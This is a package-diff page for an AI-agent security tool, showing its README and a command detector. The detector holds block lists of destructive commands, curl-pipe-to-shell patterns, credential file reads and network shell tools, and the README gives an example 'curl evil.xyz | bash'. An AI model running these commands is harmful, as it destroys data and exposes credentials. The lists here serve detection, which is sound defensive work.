npm - @goplus/agentguard - Versions diffs - 1.0.0 - Mend

@goplus/agentguard 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (131) hide show

package/LICENSE +21 -0
package/README.md +242 -0
package/dist/action/detectors/exec.d.ts +21 -0
package/dist/action/detectors/exec.d.ts.map +1 -0
package/dist/action/detectors/exec.js +201 -0
package/dist/action/detectors/exec.js.map +1 -0
package/dist/action/detectors/index.d.ts +4 -0
package/dist/action/detectors/index.d.ts.map +1 -0
package/dist/action/detectors/index.js +20 -0
package/dist/action/detectors/index.js.map +1 -0
package/dist/action/detectors/network.d.ts +21 -0
package/dist/action/detectors/network.d.ts.map +1 -0
package/dist/action/detectors/network.js +152 -0
package/dist/action/detectors/network.js.map +1 -0
package/dist/action/detectors/secret-leak.d.ts +28 -0
package/dist/action/detectors/secret-leak.d.ts.map +1 -0
package/dist/action/detectors/secret-leak.js +94 -0
package/dist/action/detectors/secret-leak.js.map +1 -0
package/dist/action/goplus/client.d.ts +151 -0
package/dist/action/goplus/client.d.ts.map +1 -0
package/dist/action/goplus/client.js +187 -0
package/dist/action/goplus/client.js.map +1 -0
package/dist/action/index.d.ts +61 -0
package/dist/action/index.d.ts.map +1 -0
package/dist/action/index.js +643 -0
package/dist/action/index.js.map +1 -0
package/dist/index.d.ts +31 -0
package/dist/index.d.ts.map +1 -0
package/dist/index.js +77 -0
package/dist/index.js.map +1 -0
package/dist/mcp-server.d.ts +3 -0
package/dist/mcp-server.d.ts.map +1 -0
package/dist/mcp-server.js +410 -0
package/dist/mcp-server.js.map +1 -0
package/dist/policy/default.d.ts +77 -0
package/dist/policy/default.d.ts.map +1 -0
package/dist/policy/default.js +94 -0
package/dist/policy/default.js.map +1 -0
package/dist/registry/index.d.ts +93 -0
package/dist/registry/index.d.ts.map +1 -0
package/dist/registry/index.js +280 -0
package/dist/registry/index.js.map +1 -0
package/dist/registry/storage.d.ts +69 -0
package/dist/registry/storage.d.ts.map +1 -0
package/dist/registry/storage.js +208 -0
package/dist/registry/storage.js.map +1 -0
package/dist/registry/trust.d.ts +41 -0
package/dist/registry/trust.d.ts.map +1 -0
package/dist/registry/trust.js +139 -0
package/dist/registry/trust.js.map +1 -0
package/dist/scanner/file-walker.d.ts +34 -0
package/dist/scanner/file-walker.d.ts.map +1 -0
package/dist/scanner/file-walker.js +134 -0
package/dist/scanner/file-walker.js.map +1 -0
package/dist/scanner/index.d.ts +67 -0
package/dist/scanner/index.d.ts.map +1 -0
package/dist/scanner/index.js +349 -0
package/dist/scanner/index.js.map +1 -0
package/dist/scanner/rules/exfiltration.d.ts +6 -0
package/dist/scanner/rules/exfiltration.d.ts.map +1 -0
package/dist/scanner/rules/exfiltration.js +48 -0
package/dist/scanner/rules/exfiltration.js.map +1 -0
package/dist/scanner/rules/index.d.ts +18 -0
package/dist/scanner/rules/index.d.ts.map +1 -0
package/dist/scanner/rules/index.js +54 -0
package/dist/scanner/rules/index.js.map +1 -0
package/dist/scanner/rules/obfuscation.d.ts +6 -0
package/dist/scanner/rules/obfuscation.d.ts.map +1 -0
package/dist/scanner/rules/obfuscation.js +37 -0
package/dist/scanner/rules/obfuscation.js.map +1 -0
package/dist/scanner/rules/prompt-injection.d.ts +6 -0
package/dist/scanner/rules/prompt-injection.d.ts.map +1 -0
package/dist/scanner/rules/prompt-injection.js +38 -0
package/dist/scanner/rules/prompt-injection.js.map +1 -0
package/dist/scanner/rules/remote-loader.d.ts +6 -0
package/dist/scanner/rules/remote-loader.d.ts.map +1 -0
package/dist/scanner/rules/remote-loader.js +31 -0
package/dist/scanner/rules/remote-loader.js.map +1 -0
package/dist/scanner/rules/secrets.d.ts +6 -0
package/dist/scanner/rules/secrets.d.ts.map +1 -0
package/dist/scanner/rules/secrets.js +68 -0
package/dist/scanner/rules/secrets.js.map +1 -0
package/dist/scanner/rules/shell-exec.d.ts +6 -0
package/dist/scanner/rules/shell-exec.d.ts.map +1 -0
package/dist/scanner/rules/shell-exec.js +52 -0
package/dist/scanner/rules/shell-exec.js.map +1 -0
package/dist/scanner/rules/web3.d.ts +6 -0
package/dist/scanner/rules/web3.d.ts.map +1 -0
package/dist/scanner/rules/web3.js +139 -0
package/dist/scanner/rules/web3.js.map +1 -0
package/dist/tests/action.test.d.ts +2 -0
package/dist/tests/action.test.d.ts.map +1 -0
package/dist/tests/action.test.js +127 -0
package/dist/tests/action.test.js.map +1 -0
package/dist/tests/registry.test.d.ts +2 -0
package/dist/tests/registry.test.d.ts.map +1 -0
package/dist/tests/registry.test.js +109 -0
package/dist/tests/registry.test.js.map +1 -0
package/dist/tests/scanner.test.d.ts +2 -0
package/dist/tests/scanner.test.d.ts.map +1 -0
package/dist/tests/scanner.test.js +57 -0
package/dist/tests/scanner.test.js.map +1 -0
package/dist/types/action.d.ts +198 -0
package/dist/types/action.d.ts.map +1 -0
package/dist/types/action.js +3 -0
package/dist/types/action.js.map +1 -0
package/dist/types/index.d.ts +5 -0
package/dist/types/index.d.ts.map +1 -0
package/dist/types/index.js +22 -0
package/dist/types/index.js.map +1 -0
package/dist/types/registry.d.ts +104 -0
package/dist/types/registry.d.ts.map +1 -0
package/dist/types/registry.js +21 -0
package/dist/types/registry.js.map +1 -0
package/dist/types/scanner.d.ts +88 -0
package/dist/types/scanner.d.ts.map +1 -0
package/dist/types/scanner.js +20 -0
package/dist/types/scanner.js.map +1 -0
package/dist/types/skill.d.ts +52 -0
package/dist/types/skill.d.ts.map +1 -0
package/dist/types/skill.js +33 -0
package/dist/types/skill.js.map +1 -0
package/dist/utils/hash.d.ts +21 -0
package/dist/utils/hash.d.ts.map +1 -0
package/dist/utils/hash.js +112 -0
package/dist/utils/hash.js.map +1 -0
package/dist/utils/patterns.d.ts +74 -0
package/dist/utils/patterns.d.ts.map +1 -0
package/dist/utils/patterns.js +157 -0
package/dist/utils/patterns.js.map +1 -0
package/package.json +60 -0

package/LICENSE ADDED Viewed

@@ -0,0 +1,21 @@
+MIT License
+Copyright (c) 2025 GoPlusSecurity
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

package/README.md ADDED Viewed

@@ -0,0 +1,242 @@
+# GoPlus AgentGuard
+**Security guard for your AI agent.** Automatically blocks dangerous commands, prevents data leaks, and protects your secrets.
+Your AI agent can execute `rm -rf /`, read your SSH keys, and send passwords to Discord. GoPlus AgentGuard stops all of that.
+[![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg)](LICENSE)
+[![Node.js](https://img.shields.io/badge/node-%3E%3D18-green.svg)](https://nodejs.org)
+[![TypeScript](https://img.shields.io/badge/TypeScript-strict-blue.svg)](https://www.typescriptlang.org)
+[![Agent Skills](https://img.shields.io/badge/Agent_Skills-compatible-purple.svg)](https://agentskills.io)
+## What It Does
+GoPlus AgentGuard protects your AI coding agent with two layers:
+**Layer 1 — Automatic Guard (hooks)**: Install once, forget about it. GoPlus AgentGuard intercepts dangerous tool calls in real time:
+- Blocks `rm -rf /`, fork bombs, `curl | bash` and other destructive commands
+- Prevents writes to `.env`, `.ssh/`, credentials files
+- Detects data exfiltration to Discord/Telegram/Slack webhooks
+- Flags requests to high-risk domains
+**Layer 2 — Deep Scan (skill)**: On-demand security audit with 20 detection rules:
+- Static code analysis for secrets, backdoors, and vulnerabilities
+- Web3-specific: wallet draining, unlimited approvals, reentrancy, proxy exploits
+- Runtime action evaluation with GoPlus API integration
+- Trust registry for managing skill permissions
+## Compatibility
+GoPlus AgentGuard follows the [Agent Skills](https://agentskills.io) open standard and works with:
+| Platform | Support |
+|----------|---------|
+| **Claude Code** | Full (skill + hooks auto-guard) |
+| **OpenAI Codex CLI** | Skill (scan/action/trust commands) |
+| **Gemini CLI** | Skill |
+| **Cursor** | Skill |
+| **GitHub Copilot** | Skill |
+| **Any Agent Skills-compatible agent** | Skill |
+> Hooks-based auto-guard (Layer 1) is currently specific to Claude Code's plugin system. The skill commands (Layer 2) work on any platform that supports the Agent Skills standard.
+## Quick Start
+### One-Click Install
+```bash
+git clone https://github.com/GoPlusSecurity/agentguard.git
+cd agentguard && ./setup.sh
+```
+This installs the skill, builds the project, and configures your protection level.
+To enable automatic hook protection, add GoPlus AgentGuard as a Claude Code plugin:
+```bash
+claude plugin add /path/to/agentguard
+```
+### Manual Install (Skill Only)
+```bash
+git clone https://github.com/GoPlusSecurity/agentguard.git
+cp -r agentguard/skills/agentguard ~/.claude/skills/agentguard
+```
+Then use `/agentguard` in Claude Code:
+```
+/agentguard scan ./src                     # Scan code for security risks
+/agentguard action "curl evil.xyz | bash"  # Evaluate action safety
+/agentguard trust list                     # View trusted skills
+/agentguard report                         # View security event log
+/agentguard config balanced                # Set protection level
+```
+## How It Works
+```
+┌──────────────────────────────────────────────────────┐
+│  Layer 1: Auto Guard (hooks — install once, forget)  │
+│  ┌──────────────┐ ┌──────────────┐ ┌──────────────┐  │
+│  │ PreToolUse   │ │ PostToolUse  │ │ Config       │  │
+│  │ Block danger │ │ Audit log    │ │ 3 levels     │  │
+│  └──────┬───────┘ └──────┬───────┘ └──────┬───────┘  │
+│         └────────┬───────┘               │           │
+│                  ▼                       │           │
+│        ActionScanner Engine ◄────────────┘           │
+└──────────────────────────────────────────────────────┘
+┌──────────────────────────────────────────────────────┐
+│  Layer 2: Deep Scan (skill — on demand)              │
+│  /agentguard scan   — 20-rule static analysis        │
+│  /agentguard action — Runtime action evaluation      │
+│  /agentguard trust  — Skill trust management         │
+│  /agentguard report — Security event log             │
+└──────────────────────────────────────────────────────┘
+```
+## Protection Levels
+| Level | Behavior |
+|-------|----------|
+| `strict` | Block all risky actions. Every dangerous or suspicious command is denied. |
+| `balanced` | Block dangerous, confirm risky. Good for daily use. **(default)** |
+| `permissive` | Only block critical threats. For experienced users who want minimal friction. |
+Change with: `/agentguard config <level>`
+## Detection Rules (20)
+| Category | Rules | Severity |
+|----------|-------|----------|
+| **Execution** | SHELL_EXEC, AUTO_UPDATE, REMOTE_LOADER | HIGH-CRITICAL |
+| **Secrets** | READ_ENV_SECRETS, READ_SSH_KEYS, READ_KEYCHAIN, PRIVATE_KEY_PATTERN, MNEMONIC_PATTERN | MEDIUM-CRITICAL |
+| **Exfiltration** | NET_EXFIL_UNRESTRICTED, WEBHOOK_EXFIL | HIGH-CRITICAL |
+| **Obfuscation** | OBFUSCATION, PROMPT_INJECTION | HIGH-CRITICAL |
+| **Web3** | WALLET_DRAINING, UNLIMITED_APPROVAL, DANGEROUS_SELFDESTRUCT, HIDDEN_TRANSFER, PROXY_UPGRADE, FLASH_LOAN_RISK, REENTRANCY_PATTERN, SIGNATURE_REPLAY | MEDIUM-CRITICAL |
+## Try It
+Scan the included vulnerable demo project:
+```
+/agentguard scan examples/vulnerable-skill
+```
+Expected output: **CRITICAL** risk level with **20 detection hits** across JavaScript and Solidity files. This demo contains intentionally vulnerable code (curl|bash, hardcoded keys, webhook exfil, reentrancy, etc.) to showcase all 20 detection rules.
+## Advanced Usage
+### As MCP Server
+```json
+{
+  "mcpServers": {
+    "agentguard": {
+      "command": "npx",
+      "args": ["-y", "agentguard"],
+      "env": {
+        "GOPLUS_API_KEY": "your_key",
+        "GOPLUS_API_SECRET": "your_secret"
+      }
+    }
+  }
+}
+```
+MCP tools: `skill_scanner_scan`, `registry_lookup`, `registry_attest`, `registry_revoke`, `registry_list`, `action_scanner_decide`, `action_scanner_simulate_web3`
+### As SDK
+```typescript
+import { createAgentGuard } from 'agentguard';
+const { scanner, registry, actionScanner } = createAgentGuard();
+// Scan code
+const result = await scanner.scan({
+  skill: { id: 'my-skill', source: 'github.com/org/skill', version_ref: 'v1.0.0', artifact_hash: '' },
+  payload: { type: 'dir', ref: '/path/to/skill' },
+});
+console.log(result.risk_level); // 'low' | 'medium' | 'high' | 'critical'
+// Evaluate action
+const decision = await actionScanner.decide({
+  actor: { skill: { id: 'my-skill', source: 'cli', version_ref: '1.0.0', artifact_hash: '' } },
+  action: { type: 'exec_command', data: { command: 'rm -rf /' } },
+  context: { session_id: 's1', user_present: true, env: 'prod', time: new Date().toISOString() },
+});
+console.log(decision.decision); // 'deny'
+```
+### Trust Management
+```
+/agentguard trust attest --id my-bot --source github.com/org/bot --version v1.0.0 --hash abc --trust-level restricted --preset trading_bot --reviewed-by admin
+/agentguard trust lookup --source github.com/org/bot
+/agentguard trust revoke --source github.com/org/bot --reason "security concern"
+/agentguard trust list --trust-level trusted
+```
+Presets: `none` | `read_only` | `trading_bot` | `defi`
+### GoPlus API (Web3)
+For enhanced Web3 security (phishing detection, address security, transaction simulation):
+```bash
+export GOPLUS_API_KEY=your_key
+export GOPLUS_API_SECRET=your_secret
+```
+Get keys at: https://gopluslabs.io/security-api
+### External Scanner
+GoPlus AgentGuard integrates with [cisco-ai-defense/skill-scanner](https://github.com/cisco-ai-defense/skill-scanner) for YAML/YARA patterns, Python AST analysis, and VirusTotal integration:
+```bash
+pip install cisco-ai-skill-scanner
+```
+## Project Structure
+```
+agentguard/
+├── skills/agentguard/        # Agent Skills definition
+│   ├── SKILL.md               # Skill entry point
+│   ├── scan-rules.md          # Detection rule reference
+│   ├── action-policies.md     # Action policy reference
+│   ├── web3-patterns.md       # Web3 patterns reference
+│   └── scripts/               # CLI tools (trust-cli, action-cli, guard-hook)
+├── hooks/hooks.json           # Plugin hooks configuration
+├── src/                       # TypeScript source
+│   ├── scanner/               # 20-rule static analysis engine
+│   ├── action/                # Runtime action evaluator + GoPlus integration
+│   ├── registry/              # Trust level management
+│   ├── policy/                # Default policies and presets
+│   └── tests/                 # Test suite
+├── examples/vulnerable-skill/ # Demo project for testing
+├── data/registry.json         # Trust registry storage
+├── setup.sh                   # One-click install script
+└── dist/                      # Compiled output
+```
+## Testing
+```bash
+npm install && npm run build && npm test
+```
+32 tests across 4 suites: scanner rules, exec command detector, network request detector, and registry CRUD.
+## License
+[MIT](LICENSE)
+## Contributing
+Contributions welcome! See [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines.
+Built by [GoPlus Security](https://gopluslabs.io).

package/dist/action/detectors/exec.d.ts ADDED Viewed

@@ -0,0 +1,21 @@
+import type { ExecCommandData, ActionEvidence } from '../../types/action.js';
+/**
+ * Command execution analysis result
+ */
+export interface ExecAnalysisResult {
+    /** Risk level */
+    risk_level: 'low' | 'medium' | 'high' | 'critical';
+    /** Risk tags */
+    risk_tags: string[];
+    /** Evidence */
+    evidence: ActionEvidence[];
+    /** Should block */
+    should_block: boolean;
+    /** Block reason */
+    block_reason?: string;
+}
+/**
+ * Analyze a command for security risks
+ */
+export declare function analyzeExecCommand(command: ExecCommandData, execAllowed?: boolean): ExecAnalysisResult;
+//# sourceMappingURL=exec.d.ts.map

package/dist/action/detectors/exec.d.ts.map ADDED Viewed

@@ -0,0 +1 @@

+ {"version":3,"file":"exec.d.ts","sourceRoot":"","sources":["../../../src/action/detectors/exec.ts"],"names":[],"mappings":"AAAA,OAAO,KAAK,EAAE,eAAe,EAAE,cAAc,EAAE,MAAM,uBAAuB,CAAC;AAE7E;;GAEG;AACH,MAAM,WAAW,kBAAkB;IACjC,iBAAiB;IACjB,UAAU,EAAE,KAAK,GAAG,QAAQ,GAAG,MAAM,GAAG,UAAU,CAAC;IACnD,gBAAgB;IAChB,SAAS,EAAE,MAAM,EAAE,CAAC;IACpB,eAAe;IACf,QAAQ,EAAE,cAAc,EAAE,CAAC;IAC3B,mBAAmB;IACnB,YAAY,EAAE,OAAO,CAAC;IACtB,mBAAmB;IACnB,YAAY,CAAC,EAAE,MAAM,CAAC;CACvB;AA2ED;;GAEG;AACH,wBAAgB,kBAAkB,CAChC,OAAO,EAAE,eAAe,EACxB,WAAW,GAAE,OAAe,GAC3B,kBAAkB,CAsIpB"}

package/dist/action/detectors/exec.js ADDED Viewed

@@ -0,0 +1,201 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.analyzeExecCommand = analyzeExecCommand;
+/**
+ * Dangerous commands that should always be blocked
+ */
+const DANGEROUS_COMMANDS = [
+    'rm -rf',
+    'rm -fr',
+    'mkfs',
+    'dd if=',
+    ':(){:|:&};:', // Fork bomb
+    'chmod 777',
+    'chmod -R 777',
+    '> /dev/sda',
+    'mv /* ',
+    'wget.*\\|.*sh',
+    'curl.*\\|.*sh',
+    'curl.*\\|.*bash',
+    'wget.*\\|.*bash',
+];
+/**
+ * Commands that access sensitive data
+ */
+const SENSITIVE_COMMANDS = [
+    'cat /etc/passwd',
+    'cat /etc/shadow',
+    'cat ~/.ssh',
+    'cat ~/.aws',
+    'cat ~/.kube',
+    'cat ~/.npmrc',
+    'cat ~/.netrc',
+    'printenv',
+    'env',
+    'set',
+];
+/**
+ * Commands that modify system state
+ */
+const SYSTEM_COMMANDS = [
+    'sudo',
+    'su ',
+    'chown',
+    'chmod',
+    'chgrp',
+    'useradd',
+    'userdel',
+    'groupadd',
+    'passwd',
+    'visudo',
+    'systemctl',
+    'service ',
+    'init ',
+    'shutdown',
+    'reboot',
+    'halt',
+];
+/**
+ * Network-related commands
+ */
+const NETWORK_COMMANDS = [
+    'curl ',
+    'wget ',
+    'nc ',
+    'netcat',
+    'ncat',
+    'ssh ',
+    'scp ',
+    'rsync ',
+    'ftp ',
+    'sftp ',
+];
+/**
+ * Analyze a command for security risks
+ */
+function analyzeExecCommand(command, execAllowed = false) {
+    const fullCommand = command.args
+        ? `${command.command} ${command.args.join(' ')}`
+        : command.command;
+    const lowerCommand = fullCommand.toLowerCase();
+    const riskTags = [];
+    const evidence = [];
+    let riskLevel = 'low';
+    let shouldBlock = !execAllowed; // Block by default if exec not allowed
+    let blockReason = execAllowed
+        ? undefined
+        : 'Command execution not allowed';
+    // Check for dangerous commands
+    for (const dangerous of DANGEROUS_COMMANDS) {
+        if (lowerCommand.includes(dangerous.toLowerCase())) {
+            riskTags.push('DANGEROUS_COMMAND');
+            evidence.push({
+                type: 'dangerous_command',
+                field: 'command',
+                match: dangerous,
+                description: `Dangerous command pattern detected: ${dangerous}`,
+            });
+            riskLevel = 'critical';
+            shouldBlock = true;
+            blockReason = `Dangerous command: ${dangerous}`;
+            break;
+        }
+    }
+    // Check for sensitive data access
+    for (const sensitive of SENSITIVE_COMMANDS) {
+        if (lowerCommand.includes(sensitive.toLowerCase())) {
+            riskTags.push('SENSITIVE_DATA_ACCESS');
+            evidence.push({
+                type: 'sensitive_access',
+                field: 'command',
+                match: sensitive,
+                description: `Sensitive data access: ${sensitive}`,
+            });
+            if (riskLevel !== 'critical')
+                riskLevel = 'high';
+        }
+    }
+    // Check for system commands
+    for (const sys of SYSTEM_COMMANDS) {
+        if (lowerCommand.startsWith(sys.toLowerCase()) ||
+            lowerCommand.includes(' ' + sys.toLowerCase())) {
+            riskTags.push('SYSTEM_COMMAND');
+            evidence.push({
+                type: 'system_command',
+                field: 'command',
+                match: sys.trim(),
+                description: `System modification command: ${sys.trim()}`,
+            });
+            if (riskLevel === 'low')
+                riskLevel = 'medium';
+        }
+    }
+    // Check for network commands
+    for (const net of NETWORK_COMMANDS) {
+        if (lowerCommand.startsWith(net.toLowerCase()) ||
+            lowerCommand.includes(' ' + net.toLowerCase())) {
+            riskTags.push('NETWORK_COMMAND');
+            evidence.push({
+                type: 'network_command',
+                field: 'command',
+                match: net.trim(),
+                description: `Network command: ${net.trim()}`,
+            });
+            if (riskLevel === 'low')
+                riskLevel = 'medium';
+        }
+    }
+    // Check for shell injection patterns
+    const shellInjectionPatterns = [
+        /;\s*\w+/, // ; command
+        /\|\s*\w+/, // | command
+        /`[^`]+`/, // `command`
+        /\$\([^)]+\)/, // $(command)
+        /&&\s*\w+/, // && command
+        /\|\|\s*\w+/, // || command
+    ];
+    for (const pattern of shellInjectionPatterns) {
+        if (pattern.test(fullCommand)) {
+            riskTags.push('SHELL_INJECTION_RISK');
+            evidence.push({
+                type: 'shell_injection',
+                field: 'command',
+                description: 'Command contains shell metacharacters',
+            });
+            if (riskLevel === 'low')
+                riskLevel = 'medium';
+            break;
+        }
+    }
+    // Check environment variables for secrets
+    if (command.env) {
+        const sensitiveEnvKeys = [
+            'API_KEY',
+            'SECRET',
+            'PASSWORD',
+            'TOKEN',
+            'PRIVATE',
+            'CREDENTIAL',
+        ];
+        for (const [key, value] of Object.entries(command.env)) {
+            const upperKey = key.toUpperCase();
+            if (sensitiveEnvKeys.some((s) => upperKey.includes(s))) {
+                riskTags.push('SENSITIVE_ENV_VAR');
+                evidence.push({
+                    type: 'sensitive_env',
+                    field: 'env',
+                    match: key,
+                    description: `Sensitive environment variable: ${key}`,
+                });
+            }
+        }
+    }
+    return {
+        risk_level: riskLevel,
+        risk_tags: riskTags,
+        evidence,
+        should_block: shouldBlock,
+        block_reason: blockReason,
+    };
+}
+//# sourceMappingURL=exec.js.map

package/dist/action/detectors/exec.js.map ADDED Viewed

@@ -0,0 +1 @@

+ {"version":3,"file":"exec.js","sourceRoot":"","sources":["../../../src/action/detectors/exec.ts"],"names":[],"mappings":"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